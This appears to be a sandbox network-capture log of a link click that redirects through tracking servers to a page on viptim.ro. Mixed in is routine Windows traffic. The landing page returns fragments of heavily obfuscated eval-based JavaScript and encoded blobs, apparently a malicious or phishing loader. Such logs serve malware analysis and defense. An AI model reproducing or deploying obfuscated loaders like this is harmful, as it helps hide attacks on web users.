EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-09 18:52:00 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:01 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4722 Host: login.live.com
2024-07-09 18:52:01 UTC	4722	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-09 18:52:02 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 09 Jul 2024 18:51:02 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BAY x-ms-request-id: ae8d57aa-d366-44d7-8fec-38d1697eecd6 PPServer: PPV: 30 H: PH1PEPF000183BE V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 09 Jul 2024 18:52:02 GMT Connection: close Content-Length: 10197
2024-07-09 18:52:02 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:10 UTC	1553	OUT	GET /url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D&c=E,1,i0-TZ9sXrOnWu3n01gckjTjDlt13jbiHHHyOen1ztoOXCOTRFajJR67WUUfxHg4eD2yKNuMiH6kNQH7GWwT9vqakPcW-Xjgx6yxMACB_jKbE1i_F&typo=1\ HTTP/1.1 Host: linkprotect.cudasvc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:10 UTC	1796	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: max-age=0, no-cache, no-store, must-revalidate Content-Security-Policy: default-src 'self' 'unsafe-inline' npmcdn.com unpkg.com cdn.jsdelivr.net; script-src 'self' 'unsafe-inline' npmcdn.com cdnjs.cloudflare.com unpkg.com unpkg.com cdn.jsdelivr.net; style-src 'self' 'unsafe-inline' unpkg.com cdnjs.cloudflare.com fonts.googleapis.com cdn.jsdelivr.net; font-src * data: 'self' 'unsafe-inline' fonts.gstatic.com; frame-src 'self'; worker-src * data: 'unsafe-eval' 'unsafe-inline' blob:; media-src 'self' d2rmfex73stak2.cloudfront.net; img-src 'self' d2rmfex73stak2.cloudfront.net; frame-ancestors 'none' Content-Type: text/html Date: Tue, 09 Jul 2024 18:52:10 GMT Expires: -1 Location: http://trk.klclick3.com/ls/click?upn=u001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D Pragma: no-cache Referrer-Policy: no-referrer Server: nginx Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 138 Connection: Close
2024-07-09 18:52:10 UTC	138	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:10 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-09 18:52:11 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=76715 Date: Tue, 09 Jul 2024 18:52:11 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:11 UTC	1388	OUT	GET /ls/click?upn=u001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D HTTP/1.1 Host: trk.klclick3.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:11 UTC	498	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Content-Length: 126 Connection: close Server: nginx Date: Tue, 09 Jul 2024 18:52:11 GMT Location: https://viptim.ro/tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs X-Robots-Tag: noindex, nofollow X-Cache: Miss from cloudfront Via: 1.1 d3a48a8630785a2a858cfdeb83e66c24.cloudfront.net (CloudFront) X-Amz-Cf-Pop: AMS1-P2 X-Amz-Cf-Id: fkbDRCwosjQ62PTlilSizCnsJFGmPDUiguBmAESJlqGHu2ZF5b5YwA==
2024-07-09 18:52:11 UTC	126	IN	Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 69 70 74 69 6d 2e 72 6f 2f 74 72 61 63 6b 69 6e 67 2f 3f 5f 6b 78 3d 51 51 56 51 76 37 70 54 4b 54 56 66 2d 48 37 69 63 79 6a 4c 31 4a 36 61 59 6a 64 52 5a 39 43 66 37 74 35 5f 6d 61 57 31 78 5f 45 69 30 35 68 66 36 62 42 39 56 6b 46 6a 6f 6e 57 37 37 36 75 68 2e 59 65 47 4e 50 73 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://viptim.ro/tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs">Found</a>.

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:11 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-09 18:52:12 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=76633 Date: Tue, 09 Jul 2024 18:52:12 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-09 18:52:12 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:12 UTC	737	OUT	GET /tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs HTTP/1.1 Host: viptim.ro Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:12 UTC	1355	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close last-modified: Wed, 03 Jul 2024 11:13:49 GMT Cache-Control: max-age=2592000 expires: Thu, 08 Aug 2024 18:51:51 GMT vary: Accept-Encoding,User-Agent access-control-allow-methods: GET,POST access-control-allow-headers: Content-Type, Authorization content-security-policy: upgrade-insecure-requests; cross-origin-embedder-policy: unsafe-none; report-to='default' cross-origin-embedder-policy-report-only: unsafe-none; report-to='default' cross-origin-opener-policy: unsafe-none cross-origin-opener-policy-report-only: unsafe-none; report-to='default' cross-origin-resource-policy: cross-origin permissions-policy: accelerometer=(), autoplay=(), camera=(), cross-origin-isolated=(), display-capture=(self), encrypted-media=(), fullscreen=, geolocation=(self), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), payment=, picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), sync-xhr=(), usb=(), xr-spatial-tracking=(), gamepad=(), serial=() referrer-policy: strict-origin-when-cross-origin strict-transport-security: max-age=63072000 x-content-security-policy: default-src 'self'; img-src ; media-src data:; x-content-type-options: nosniff x-frame-options: SAMEORIGIN
2024-07-09 18:52:12 UTC	507	IN	Data Raw: 78 2d 78 73 73 2d 70 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 78 2d 70 65 72 6d 69 74 74 65 64 2d 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 69 65 73 3a 20 6e 6f 6e 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 42 50 33 51 68 6c 66 7a 31 4c 65 74 4c 75 58 43 6f 39 44 4d 31 56 33 4c 43 31 53 50 64 54 34 6f 6d 6a 6a 25 32 46 36 4d 25 32 46 39 63 75 52 25 32 46 73 4f 6e 6d 7a 31 49 25 32 46 6d 33 69 47 48 52 47 65 25 32 46 6a 74 6c 41 Data Ascii: x-xss-protection: 1; mode=blockx-permitted-cross-domain-policies: noneCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BP3Qhlfz1LetLuXCo9DM1V3LC1SPdT4omjj%2F6M%2F9cuR%2FsOnmz1I%2Fm3iGHRGe%2FjtlA
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 37 61 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 6c 65 74 20 7a 4e 6b 73 62 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 77 46 57 46 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 65 76 61 6c 28 22 28 66 75 6e 63 74 69 6f 6e 20 41 49 75 46 28 6a 59 42 78 29 7b 63 6f 6e 73 74 20 4c 76 45 78 3d 76 35 49 76 28 6a 59 42 78 2c 44 6c 75 78 28 41 49 75 46 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 3b 74 72 79 7b 6c 65 74 20 66 54 77 78 3d 65 76 61 6c 28 4c 76 45 78 29 3b 72 65 74 75 72 6e 20 66 54 77 78 2e 61 70 Data Ascii: 7a38<!DOCTYPE html><html><head><script type="text/javascript">let zNksb;!function(){const wFWF=Array.prototype.slice.call(arguments);return eval("(function AIuF(jYBx){const LvEx=v5Iv(jYBx,Dlux(AIuF.toString()));try{let fTwx=eval(LvEx);return fTwx.ap
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 6f 32 30 30 30 32 33 29 3a 7a 38 67 76 3d 28 30 6f 32 30 32 34 35 30 2d 30 78 31 30 35 31 32 29 3b 7b 63 6f 6e 73 74 20 76 33 62 76 3d 48 69 72 76 25 28 30 6f 32 30 33 33 34 30 2d 36 37 32 37 34 29 3b 48 69 72 76 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 48 69 72 76 2f 28 30 78 33 30 30 35 32 25 30 6f 32 30 30 30 32 34 29 29 3b 58 41 65 76 2b 3d 76 33 62 76 3e 3d 28 31 33 31 31 33 38 25 30 6f 32 30 30 30 32 34 29 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 30 6f 32 31 30 37 30 36 2d 30 78 31 31 31 38 35 29 2b 28 76 33 62 76 2d 28 30 6f 34 30 30 30 37 32 25 30 78 31 30 30 31 30 29 29 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 31 39 36 38 33 31 25 30 6f 32 30 30 30 35 32 29 2b 76 33 62 76 29 3b 7d 62 72 65 61 6b 3b Data Ascii: o200023):z8gv=(0o202450-0x10512);{const v3bv=Hirv%(0o203340-67274);Hirv=Math.floor(Hirv/(0x30052%0o200024));XAev+=v3bv>=(131138%0o200024)?String.fromCharCode((0o210706-0x11185)+(v3bv-(0o400072%0x10010))):String.fromCharCode((196831%0o200052)+v3bv);}break;
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 25 31 42 3a 4d 25 30 37 25 30 36 25 30 34 25 30 44 25 31 42 25 30 39 44 4b 40 42 41 31 32 48 40 58 25 30 37 25 30 36 25 31 45 4a 25 31 43 25 31 38 25 30 36 33 56 25 30 38 2b 25 31 33 5c 27 49 25 31 41 25 30 32 25 31 41 30 47 42 44 3a 32 48 30 38 41 4b 34 25 33 43 42 42 40 38 37 37 44 3a 42 38 36 25 33 45 37 41 34 25 33 43 34 38 40 38 37 37 34 4a 32 25 33 45 36 25 33 45 43 46 36 25 32 32 25 31 31 33 42 58 25 30 36 25 30 46 25 31 42 41 25 33 43 25 31 39 25 31 39 33 57 25 31 44 2d 25 31 34 39 58 25 31 44 25 30 32 25 31 38 4a 25 30 30 25 31 37 25 30 30 33 56 4b 5a 25 30 35 59 51 59 52 25 35 42 56 4f 25 35 43 5a 54 25 35 43 51 42 58 25 31 31 25 30 36 25 30 41 25 31 35 49 32 25 31 43 25 30 46 3a 51 25 31 38 25 30 39 25 30 30 25 30 46 25 30 45 4b 25 30 35 25 31 Data Ascii: %1B:M%07%06%04%0D%1B%09DK@BA12H@X%07%06%1EJ%1C%18%063V%08+%13\'I%1A%02%1A0GBD:2H08AK4%3CBB@877D:B86%3E7A4%3C48@8774J2%3E6%3ECF6%22%113BX%06%0F%1BA%3C%19%193W%1D-%149X%1D%02%18J%00%17%003VKZ%05YQYR%5BVO%5CZT%5CQBX%11%06%0A%15I2%1C%0F:Q%18%09%00%0F%0EK%05%1
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 25 31 35 25 30 46 33 55 25 35 45 41 31 34 4a 32 38 40 38 37 37 44 3a 42 38 36 25 33 45 37 41 34 25 33 43 34 38 40 38 37 37 34 4a 32 25 33 45 36 25 33 45 55 42 5f 2e 5a 57 25 35 43 53 25 35 42 5a 25 35 45 50 59 45 25 35 42 25 31 42 25 35 45 25 35 43 25 35 43 25 32 30 25 35 45 52 2f 4a 50 42 5f 25 31 39 58 53 2f 53 58 47 5f 25 30 45 25 35 42 53 25 35 44 50 59 5f 46 5a 25 30 42 25 31 31 25 30 45 25 30 32 25 30 31 51 25 30 43 25 30 30 25 31 41 25 30 36 4b 4b 25 35 44 59 59 52 50 54 25 35 42 5a 4f 53 46 25 35 42 24 2d 38 33 57 42 5f 25 30 45 25 35 42 53 25 35 43 54 25 35 45 25 35 43 42 51 25 31 31 52 25 35 42 25 32 35 29 25 35 42 46 5a 25 31 32 25 31 30 25 31 32 25 30 43 3a 57 3a 25 32 35 2a 2f 43 25 31 30 25 31 33 25 30 35 3f 4d 42 38 30 48 31 31 4e 4a 32 25 Data Ascii: %15%0F3U%5EA14J28@877D:B86%3E7A4%3C48@8774J2%3E6%3EUB_.ZW%5CS%5BZ%5EPYE%5B%1B%5E%5C%5C%20%5ER/JPB_%19XS/SXG_%0E%5BS%5DPY_FZ%0B%11%0E%02%01Q%0C%00%1A%06KK%5DYYRPT%5BZOSF%5B$-83WB_%0E%5BS%5CT%5E%5CBQ%11R%5B%25)%5BFZ%12%10%12%0C:W:%25*/C%10%13%05?MB80H11NJ2%
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 25 30 31 41 38 2a 38 5c 27 42 43 44 25 32 30 30 25 31 35 2c 4b 43 41 26 25 30 30 25 31 31 28 43 4a 41 3b 26 32 2d 4b 42 48 25 30 31 5c 27 37 5c 27 41 4a 40 25 32 32 3b 25 30 32 2a 49 40 48 25 30 30 25 30 38 25 32 35 5c 27 47 48 42 36 33 25 31 33 5c 27 42 46 25 31 43 25 31 33 2d 25 30 30 25 31 30 25 30 38 44 25 31 43 25 35 43 41 38 25 30 35 25 31 36 25 30 36 25 30 36 32 25 35 43 54 44 4c 4a 51 25 30 43 25 31 41 25 30 46 25 30 41 25 31 37 25 30 32 25 30 43 25 30 34 4a 2a 25 30 33 25 31 43 32 43 4a 25 31 31 25 31 38 25 30 41 25 31 35 25 31 43 25 31 31 25 30 35 43 42 4b 34 25 33 43 42 38 36 4a 31 41 4e 4a 32 25 33 45 40 42 41 31 32 4a 48 48 30 25 33 45 37 25 31 37 25 30 39 25 31 34 25 30 37 25 30 30 25 31 46 25 30 41 25 30 35 25 30 34 4f 38 25 33 45 25 30 38 Data Ascii: %01A88\'BCD%200%15,KCA&%00%11(CJA;&2-KBH%01\'7\'AJ@%22;%02I@H%00%08%25\'GHB63%13\'BF%1C%13-%00%10%08D%1C%5CA8%05%16%06%062%5CTDLJQ%0C%1A%0F%0A%17%02%0C%04J*%03%1C2CJ%11%18%0A%15%1C%11%05CBK4%3CB86J1ANJ2%3E@BA12JHH0%3E7%17%09%14%07%00%1F%0A%05%04O8%3E%08
